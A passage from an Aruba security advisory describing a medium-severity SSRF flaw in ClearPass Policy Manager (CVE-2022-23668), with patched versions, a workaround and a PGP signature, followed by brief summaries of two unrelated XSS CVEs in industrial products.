Severity: Medium CVSSv3.x Overall Score: 4.7 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L Discovery: This vulnerability was discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Authenticated Server-Side Request Forgery (SSRF) Leading to Information Disclosure (CVE-2022-23668) --------------------------------------------------------------------- A vulnerability in the web-based management interface of ClearPass Policy Manager could allow an unauthenticated remote attacker to conduct a server-side request forgery (SSRF) attack. A successful exploit allows an attacker to enumerate information about the internal structure of the ClearPass Policy Manager host leading to potential disclosure of sensitive information. Internal Reference: ATLCP-124 Severity: Medium CVSSv3.x Overall Score: 4.1 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N Discovery: This vulnerability was discovered and reported by Mohammed F. Al-Barbari (bugcrowd.com/m4dm0e) via Aruba's Bug Bounty Program. Resolution ========== The vulnerabilities contained in this advisory can be addressed by patching or upgrading to one of the ClearPass Policy Manager versions listed below - ClearPass Policy Manager 6.10.x: 6.10.5 and above - ClearPass Policy Manager 6.9.x: 6.9.10 and above - ClearPass Policy Manager 6.8.x: 6.8.9-HF3 and above As a general rule, Aruba does not evaluate or patch ClearPass Policy Manager versions that have reached their End of Support (EoS) milestone. For more information about Aruba's End of Support policy visit: https://www.arubanetworks.com/support-services/end-of-life/ Workaround ========== To minimize the likelihood of an attacker exploiting these vulnerabilities, Aruba recommends that the CLI and web-based management interfaces for ClearPass Policy Manager be restricted to a dedicated layer 2 segment/VLAN and/or controlled by firewall policies at layer 3 and above ClearPass Policy Manager Security Hardening =========================================== For general information on hardening ClearPass Policy Manager instances against security threats please see the ClearPass Policy Manager Hardening Guide available at https://support.hpe.com/hpesc/public/docDisplay?docId=a00091066en\_us for ClearPass Policy Manager 6.9.x and earlier versions. For ClearPass 6.10.x the ClearPass Policy Manager Hardening Guide is available at https://www.arubanetworks.com/techdocs/ClearPass/6.10/PolicyManager/Content/home.htm Exploitation and Public Discussion ================================== Aruba is not aware of any public discussion or exploit code that target these specific vulnerabilities as of the release date of the advisory. Revision History ================ Revision 1 / 2022-May-04 / Initial release Aruba SIRT Security Procedures ============================== Complete information on reporting security vulnerabilities in Aruba Networks products and obtaining assistance with security incidents is available at: https://www.arubanetworks.com/support-services/security-bulletins/ For reporting \*NEW\* Aruba Networks security issues, email can be sent to aruba-sirt(at)hpe.com. For sensitive information we encourage the use of PGP encryption. Our public keys can be found at: https://www.arubanetworks.com/support-services/security-bulletins/ (c) Copyright 2022 by Aruba, a Hewlett Packard Enterprise company. This advisory may be redistributed freely after the release date given at the top of the text, provided that the redistributed copies are complete and unmodified, including all data and version information. -----BEGIN PGP SIGNATURE----- iQFLBAEBCAA1FiEEMd5pP5EnbG7Y0fo5mP4JykWFhtkFAmJpVl4XHHNpcnRAYXJ1 YmFuZXR3b3Jrcy5jb20ACgkQmP4JykWFhtnvWwgAnZmt6eDd2Wn2JScRccrY2gAQ nUHV7MDgqn6FRBBeRho8tpHQFaC73fSafdX9worLEFp1gUltUDDMefzpgonN0DHS ONE/tcYbwMuC6DaszY9S0MuKcdqSS6bisGsELlObi/8wP4cXZiQNEzrP9UUXX0GG OkRKksMg+Z5PuDjHqBaQEWu8f3jO3FX55JLZa5FWZwuGAFpi+UUfOloitYko+XvK /EayQ22dtxC+AUWPtMgxw1K0JwFO5vtqtsCDTctgbdKeomF1kkgw7KPIl3cvX6E+ fcL4KEFnGMXmrXislYFJXwsCWhax/ig7HC407k0U+m7Xx6AqqdmkzRETwgcTJQ== =AuGw -----END PGP SIGNATURE-----

CVE-2022-23666

The Weintek cMT product line is vulnerable to a cross-site scripting vulnerability, which could allow an unauthenticated remote attacker to inject malicious JavaScript code.

CVE-2021-27442

xArrow SCADA versions 7.2 and prior is vulnerable to cross-site scripting due to parameter ‘bdate’ of the resource xhisvalue.htm, which may allow an unauthorized attacker to execute arbitrary code.

Tag

#xss